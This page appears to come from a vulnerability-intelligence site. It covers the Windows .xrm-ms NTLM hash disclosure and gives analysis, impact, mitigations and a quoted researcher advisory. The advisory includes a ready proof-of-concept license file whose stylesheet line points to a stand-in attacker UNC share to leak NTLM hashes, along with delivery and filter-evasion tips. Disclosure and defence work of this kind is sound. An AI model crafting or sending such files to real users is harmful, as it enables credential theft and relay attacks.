Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing
Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing
AI Analysis
Technical Summary
The Microsoft Windows XRM-MS File NTLM Information Disclosure Spoofing vulnerability involves the handling of .xrm-ms files, which are digital license files associated with Microsoft's software licensing infrastructure. These files are registered to open by default in Internet Explorer on older systems and Microsoft Edge on newer Windows versions (Windows 7, 10, 11, and Server 2019). The vulnerability arises because the .xrm-ms file format supports embedding XML stylesheets via the xml-stylesheet processing instruction. An attacker can craft a malicious .xrm-ms file that references a remote UNC (Universal Naming Convention) path in the stylesheet's href attribute. When a user opens this file, the system attempts to load the stylesheet from the specified UNC path, triggering an outbound SMB (Server Message Block) connection to the attacker-controlled server or network share. This connection causes the Windows client to send its NTLM (NT LAN Manager) authentication hash to the attacker. The NTLM hash can be captured and potentially used in relay or offline cracking attacks to impersonate the user or escalate privileges. This attack requires user interaction to open the malicious .xrm-ms file, which can be delivered through various vectors such as email attachments, drive-by downloads, network shares, or compressed archives. Notably, the .xrm-ms file type is not commonly flagged as dangerous by email gateways or Microsoft Outlook 2016, and it bypasses several security controls including Mark of the Web (MOTW) warnings and active content security prompts. The default icon and association with Microsoft software may increase user trust and likelihood of opening the file. The exploit has been tested successfully on Windows 7, Windows 10, and Server 2019, with uncertain behavior on Windows 11 or recently updated systems. Microsoft’s security response classified the issue as a moderate spoofing vulnerability and declined to issue a patch, citing it does not meet their security bar. The exploit code is publicly available and written in Perl, demonstrating how to craft the malicious .xrm-ms file and trigger the NTLM hash leak. This disclosure enables attackers to leverage this information disclosure vector for reconnaissance or as a stepping stone in more complex attacks involving NTLM relay or credential theft.
Potential Impact
For European organizations, this vulnerability poses a significant risk of credential leakage, particularly in environments where Windows systems are prevalent and users may receive files from external or untrusted sources. The disclosure of NTLM hashes can facilitate lateral movement within corporate networks, privilege escalation, and unauthorized access to sensitive systems. Since the attack requires user interaction, phishing campaigns or social engineering could be used to deliver the malicious .xrm-ms files. The ability to bypass common email security filters and the lack of active content warnings increase the likelihood of successful exploitation. Organizations relying on legacy Windows versions or with insufficient endpoint protection are especially vulnerable. The impact extends to confidentiality (exposure of authentication hashes), integrity (potential unauthorized access), and availability (if attackers leverage the hashes to disrupt services). Given the widespread use of Windows in European enterprises, this vulnerability could be exploited against critical infrastructure, government agencies, and private sector companies, potentially leading to data breaches and operational disruptions.
Mitigation Recommendations
1. Implement strict email filtering rules to block or quarantine .xrm-ms files and other uncommon file types that are not essential for business operations. 2. Educate users about the risks of opening unexpected or suspicious files, especially those with uncommon extensions like .xrm-ms. 3. Disable or restrict the automatic opening of .xrm-ms files by changing file associations or using application whitelisting to prevent execution. 4. Employ network-level controls to monitor and block outbound SMB connections to untrusted or external IP addresses, mitigating NTLM hash leakage. 5. Deploy endpoint detection and response (EDR) solutions capable of detecting anomalous SMB traffic and credential theft behaviors. 6. Enforce the use of NTLMv2 with strong encryption and consider disabling NTLM authentication where feasible, migrating to Kerberos. 7. Regularly update and patch Windows systems, and monitor Microsoft advisories for any future updates related to this vulnerability. 8. Use multi-factor authentication (MFA) to reduce the risk posed by compromised NTLM hashes. 9. Review and tighten group policies related to network authentication and SMB signing to increase security against relay attacks. 10. Conduct phishing simulations and security awareness training focusing on file-based attacks and social engineering tactics.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium, Sweden, Switzerland
Indicators of Compromise
- exploit-code: # Exploit Author: John Page (aka hyp3rlinx) # Website: hyp3rlinx.altervista.org # Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt # x.com/hyp3rlinx # ISR: ApparitionSec [Vendor] www.microsoft.com [Product] .xrm-ms File Type [Vulnerability Type] NTLM Hash Disclosure (Spoofing) [Video URL PoC] https://www.youtube.com/watch?v=d5U_krLQbNY [CVE Reference] N/A [Security Issue] The Windows XRM-MS file type is related to Microsofts software licensing infrastructure. C:\> assoc .xrm-ms=MSSppLicenseFile. An "xrm-ms" digital license file opens default (times a tickin) in Internet Explorer (MSIE) and on later OS versions switches to MS Edge. The ".xrm-ms" file format allows injecting XML stylesheets that will then get processed, when a user opens it. Adversaries can reference UNC paths for the stylesheet HREF tag that points to LAN network share or attacker controlled infrastructure. This results in an outbound connection to the attacker controlled network share and or server, leaking the target NTLM hash. Works from both a LAN network share perspective or remote forced drive-by download to a target etc. User interaction is required to open the file. During testing, xrm-ms file type not blocked by Windows Office Outlook client 2016 and a popular Email Gateway Security product as of few days ago. Xrm-Ms File points: 1) XRM-MS is not considered dangerous file type 2) Defaults to open in either MSIE or Edge Win7/10/11/Server 2019 3) Default Icon as it is Windows browser may make it appear more "trust-worthy" 4) Throws no errors from the stylesheet directive when processed 5) May bypass some inbound email security inspections 6) No MOTW roadblocks 7) No active content security warnings Tested successfully in Win7/Win10/Server 2019 Mileage may vary on Windows 11 and or recently updated systems. [Exploit/POC] Delivery options: Drive-by force download Email Network Share Archive .zip etc 1) Create .xrm-ms File with following content, adjust attacker server information. Actually, all you need is the one XML stylesheet to trigger it. <?xml version="1.0" encoding="utf-8"?> <?xml-stylesheet href="\\ATTACKER-SERVER\NTLMhashLeakDontMeetMSRCBarPoC" ?> <r:license xmlns:r="http://www.microsoft.com/DRM/rightsManager"> <r:licenseID>12345-67890-ABCDE</r:licenseID> <r:productName>Windows(R) Operating System, VOLUME_KMSCLIENT channel</r:productName> <r:productKeyID>XXXXX-XXXXX-XXXXX-XXXXX-XXXXX</r:productKeyID> <r:hardwareBinding> <r:hash>AA11BB22CC33DD44EE55</r:hash> </r:hardwareBinding> <r:validity> <r:validFrom>2024-01-01T00:00:00</r:validFrom> <r:validUntil>2025-01-01T00:00:00</r:validUntil> </r:validity> <r:signature>...</r:signature> </r:license> [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: April 17, 2025 MSRC response: "report is a moderate spoofing and doesn't meet the bar." April 29, 2025 April 30, 2025 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content copyright (c). hyp3rlinx
Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing
Description
Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing
AI-Powered Analysis
Technical Analysis
The Microsoft Windows XRM-MS File NTLM Information Disclosure Spoofing vulnerability involves the handling of .xrm-ms files, which are digital license files associated with Microsoft's software licensing infrastructure. These files are registered to open by default in Internet Explorer on older systems and Microsoft Edge on newer Windows versions (Windows 7, 10, 11, and Server 2019). The vulnerability arises because the .xrm-ms file format supports embedding XML stylesheets via the xml-stylesheet processing instruction. An attacker can craft a malicious .xrm-ms file that references a remote UNC (Universal Naming Convention) path in the stylesheet's href attribute. When a user opens this file, the system attempts to load the stylesheet from the specified UNC path, triggering an outbound SMB (Server Message Block) connection to the attacker-controlled server or network share. This connection causes the Windows client to send its NTLM (NT LAN Manager) authentication hash to the attacker. The NTLM hash can be captured and potentially used in relay or offline cracking attacks to impersonate the user or escalate privileges. This attack requires user interaction to open the malicious .xrm-ms file, which can be delivered through various vectors such as email attachments, drive-by downloads, network shares, or compressed archives. Notably, the .xrm-ms file type is not commonly flagged as dangerous by email gateways or Microsoft Outlook 2016, and it bypasses several security controls including Mark of the Web (MOTW) warnings and active content security prompts. The default icon and association with Microsoft software may increase user trust and likelihood of opening the file. The exploit has been tested successfully on Windows 7, Windows 10, and Server 2019, with uncertain behavior on Windows 11 or recently updated systems. Microsoft’s security response classified the issue as a moderate spoofing vulnerability and declined to issue a patch, citing it does not meet their security bar. The exploit code is publicly available and written in Perl, demonstrating how to craft the malicious .xrm-ms file and trigger the NTLM hash leak. This disclosure enables attackers to leverage this information disclosure vector for reconnaissance or as a stepping stone in more complex attacks involving NTLM relay or credential theft.
Potential Impact
For European organizations, this vulnerability poses a significant risk of credential leakage, particularly in environments where Windows systems are prevalent and users may receive files from external or untrusted sources. The disclosure of NTLM hashes can facilitate lateral movement within corporate networks, privilege escalation, and unauthorized access to sensitive systems. Since the attack requires user interaction, phishing campaigns or social engineering could be used to deliver the malicious .xrm-ms files. The ability to bypass common email security filters and the lack of active content warnings increase the likelihood of successful exploitation. Organizations relying on legacy Windows versions or with insufficient endpoint protection are especially vulnerable. The impact extends to confidentiality (exposure of authentication hashes), integrity (potential unauthorized access), and availability (if attackers leverage the hashes to disrupt services). Given the widespread use of Windows in European enterprises, this vulnerability could be exploited against critical infrastructure, government agencies, and private sector companies, potentially leading to data breaches and operational disruptions.
Mitigation Recommendations
1. Implement strict email filtering rules to block or quarantine .xrm-ms files and other uncommon file types that are not essential for business operations. 2. Educate users about the risks of opening unexpected or suspicious files, especially those with uncommon extensions like .xrm-ms. 3. Disable or restrict the automatic opening of .xrm-ms files by changing file associations or using application whitelisting to prevent execution. 4. Employ network-level controls to monitor and block outbound SMB connections to untrusted or external IP addresses, mitigating NTLM hash leakage. 5. Deploy endpoint detection and response (EDR) solutions capable of detecting anomalous SMB traffic and credential theft behaviors. 6. Enforce the use of NTLMv2 with strong encryption and consider disabling NTLM authentication where feasible, migrating to Kerberos. 7. Regularly update and patch Windows systems, and monitor Microsoft advisories for any future updates related to this vulnerability. 8. Use multi-factor authentication (MFA) to reduce the risk posed by compromised NTLM hashes. 9. Review and tighten group policies related to network authentication and SMB signing to increase security against relay attacks. 10. Conduct phishing simulations and security awareness training focusing on file-based attacks and social engineering tactics.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52277
- Has Exploit Code
- true
- Code Language
- perl
Indicators of Compromise
Exploit Source Code
Exploit code for Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing
# Exploit Author: John Page (aka hyp3rlinx) # Website: hyp3rlinx.altervista.org # Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt # x.com/hyp3rlinx # ISR: ApparitionSec [Vendor] www.microsoft.com [Product] .xrm-ms File Type [Vulnerability Type] NTLM Hash Disclosure (Spoofing) [Video URL PoC] https://www.youtube.com/watch?v=d5U_krLQbNY [CVE Reference] N/A [Security Issue] The Windows XRM-MS file type is related to Micro... (3284 more characters)
Threat ID: 68489e437e6d765d51d54352
Added to database: 6/10/2025, 9:06:11 PM
Last enriched: 6/11/2025, 9:11:10 PM
Last updated: 7/14/2025, 12:43:04 AM
Views: 9
Related Threats
New Forensic Technique Uncovers Hidden Trails Left by Hackers Exploiting Remote Desktop Protocol
HighHistorical Analysis of Reflected Vulnerabilities: The Evolution of Windows Defender Defenses
CriticalExploits for pre-auth Fortinet FortiWeb RCE flaw released, patch now
HighU.S. CISA adds Citrix NetScaler ADC and Gateway flaw to its Known Exploited Vulnerabilities catalog
MediumExploiting Public APP_KEY Leaks to Achieve RCE in Hundreds of Laravel Applications
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.